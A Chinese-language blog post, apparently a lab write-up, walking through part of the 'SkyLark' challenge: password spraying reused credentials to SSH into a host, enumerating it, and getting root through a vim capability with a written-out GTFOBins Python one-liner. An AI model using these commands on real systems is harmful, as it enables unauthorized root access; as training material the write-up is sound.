Challenge 3 - SkyLark(11)

 Challenge 3 - SkyLark(11)

下一台回到外網的 .224 機器



在上個章節拿到的 legacy 憑證,經帳號密碼噴灑後發現可以登入 .224



直接 SSH  登入獲取第一階段的 local.txt



電腦名稱是 amsterdam05



cat /etc/passwd



cat /etc/crontab



sudo -l



SUID check



pspy64 看來就是在打 .30 時於 .224 上 8000 Port 發現的 debug.txt 檔案,對 PE 沒有幫助



執行 linpeas.sh 看到 /vim.basic 有 Capabilities 的利用



查找 GTFO 如下



切換到目錄 /usr/bin 然後執行  

./vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

發現會進入 vim 編輯模式且沒有成功 root

GTFO 有說明執行的時候要使用 python3,所以修改指令如下

./vim.basic -c ':python3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

執行後成功提權為 root,並拿取 proof.txt



更新攻擊列表





留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)